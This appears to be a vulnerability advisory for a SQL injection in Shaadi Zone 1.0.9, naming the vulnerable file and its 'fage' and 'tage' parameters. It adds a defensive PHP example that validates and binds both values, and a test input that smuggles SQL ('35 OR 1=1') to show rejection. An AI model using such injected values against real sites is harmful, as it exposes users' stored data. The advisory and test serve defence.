vendor: Shaadi Zone
by: e.wiZz!
CVSS: 7.5 HIGH
SQL Injection
CWE: 89
Product Name: Shaadi Zone
Affected Version From: 1.0.9
Affected Version To: 1.0.9
Patch Exists: NO
Related CWE: N/A
CPE: a:vastal_i_tech:shaadi_zone:1.0.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Vastal I Tech Shaadi Zone 1.0.9 SQL Injection Vulnerability
Shaadi Zone is the best solution if you are looking to run a matrimonial service. An attacker can exploit a SQL injection vulnerability in the keyword_search_action.php file by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. The 'fage' and 'tage' parameters allow arbitrary SQL code to be injected into the application's SQL queries, which can be exploited to disclose the contents of the database.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All input data should be validated and filtered before being passed to the SQL server.
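
One way to apply this mitigation to the 'fage' and 'tage' parameters, shown as an added example that is not Shaadi Zone's code: both values are validated as bounded integers and then bound to a prepared statement instead of being concatenated into the query. The `profiles` table, the 18-99 bounds, the function names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example, not Shaadi Zone code. The `profiles` table, its columns and
// the 18-99 age bounds are assumptions made for illustration.

// Return the value as an int only if it is a plain decimal within bounds.
function parse_age($raw, int $min = 18, int $max = 99): ?int
{
    if (!is_string($raw)) {
        return null;                       // rejects arrays such as fage[]=1
    }
    $age = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $age === false ? null : $age;
}

// Search by age range; the values are bound, never concatenated into SQL.
function search_by_age(PDO $db, array $params): array
{
    $from = parse_age($params['fage'] ?? null);
    $to   = parse_age($params['tage'] ?? null);
    if ($from === null || $to === null || $from > $to) {
        throw new InvalidArgumentException('invalid age range');
    }
    $stmt = $db->prepare(
        'SELECT name, age FROM profiles WHERE age BETWEEN :fage AND :tage ORDER BY age');
    $stmt->bindValue(':fage', $from, PDO::PARAM_INT);
    $stmt->bindValue(':tage', $to, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE profiles (name TEXT, age INTEGER)');
$db->exec("INSERT INTO profiles VALUES ('A', 24), ('B', 31), ('C', 45)");

// Constructed requests: one well-formed, one carrying SQL text in tage.
foreach ([['fage' => '20', 'tage' => '35'],
          ['fage' => '20', 'tage' => '35 OR 1=1']] as $request) {
    try {
        echo count(search_by_age($db, $request)), " row(s)\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```

The validation step alone would reject the malformed value; binding the parameters as well keeps the query safe if a later change loosens the validation.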